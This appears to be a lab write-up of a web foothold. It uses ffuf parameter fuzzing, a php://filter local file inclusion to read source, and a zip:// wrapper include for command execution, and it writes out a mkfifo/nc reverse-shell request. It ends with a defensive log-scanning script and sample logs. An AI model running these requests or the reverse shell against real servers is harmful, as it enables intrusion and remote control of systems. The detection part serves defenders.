Foothold

$ echo test > pwned.txt

Turn on FoxyProxy to capture the upload request.

Definitely wasn't it lol

$ ffuf -u http://192.168.241.229/index.php?FUZZ=1 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --fs 3151

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.241.229/index.php?FUZZ=1
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 3151
________________________________________________

file                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
:: Progress: [6453/6453] :: Job [1/1] :: 813 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
The file parameter found by ffuf is a local file inclusion point. Wrapping the target in php://filter with convert.base64-encode makes the server return the PHP source base64-encoded instead of executing it:

GET /index.php?file=php://filter/convert.base64-encode/resource=upload

Let's view the source code of upload.php.

$ vi upload.b64

$ cat upload.b64 | base64 -d > upload.php

The uploaded archive is stored under uploads/ with a timestamped name:

uploads/upload_1725881785.zip

The zip:// wrapper lets the same include point pull a file out of that archive: %23 is a URL-encoded #, which separates the archive path from the member name (cmd), and the cmd parameter is passed through to the included code. The first request confirms execution with id; the second replaces it with a reverse shell back to the listener on 192.168.45.168:1337.

GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=id
GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.45.168+1337+>/tmp/f
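From the defender's side, every request in this chain leaves a clear trace in the web server access log: the file parameter carries a stream-wrapper prefix (php://, zip://) rather than a plain page name. The script below is an added example, not part of this writeup, that scans Apache combined-format log lines and flags any query parameter whose value starts with a URL scheme (which generalizes beyond the two wrappers used here) or contains a .. path component. The log lines are constructed for the example and modelled on the requests above; the IPs, timestamps and user agent are made up.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines modelled on the requests in this
# writeup. IPs, timestamps and the user agent are made up for the example.
SAMPLE_LOG = """\
192.168.45.168 - - [09/Sep/2024:11:36:25 +0000] "GET /index.php?file=home HTTP/1.1" 200 3151 "-" "Mozilla/5.0"
192.168.45.168 - - [09/Sep/2024:11:36:40 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=upload HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.45.168 - - [09/Sep/2024:11:37:02 +0000] "GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=id HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.168.45.168 - - [09/Sep/2024:11:37:15 +0000] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 200 1791 "-" "Mozilla/5.0"
192.168.45.168 - - [09/Sep/2024:11:38:00 +0000] "POST /upload.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Any scheme-like prefix in a parameter value marks a PHP stream wrapper
# (php://, zip://, and the others PHP registers); a plain page name never has one.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
# A ".." path component, with either slash style, delimited or at the ends.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify_value(value: str) -> str | None:
    """Return a finding label for one query-parameter value, or None if it looks benign."""
    v = unquote(value)  # extra decode pass so double-encoded values are inspected too
    if WRAPPER_RE.match(v):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(v):
        return "path-traversal"
    return None


def analyse_line(line: str) -> list[dict]:
    """Parse one access-log line and return a finding per suspicious parameter."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; ignore rather than crash
    parts = urlsplit(m.group("target"))
    findings = []
    # parse_qsl percent-decodes once; keep_blank_values so "file=" alone is still seen
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        label = classify_value(value)
        if label:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": parts.path,
                "param": name,
                "label": label,
                "value": unquote(value),
            })
    return findings


def scan(log_text: str) -> list[dict]:
    """Scan a whole log body and collect findings in log order."""
    out: list[dict] = []
    for line in log_text.splitlines():
        out.extend(analyse_line(line))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['label']:<15} {f['path']}?{f['param']}={f['value']}")
```

Run against the sample it reports three hits: the php://filter source read, the zip:// include, and the traversal attempt, while the normal page load and the POST upload pass silently. Matching on the scheme prefix rather than a fixed list of wrapper names is deliberate: the fix for the application itself is an allowlist of includable page names, and the detection mirrors that by treating anything that is not a bare name as suspicious.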
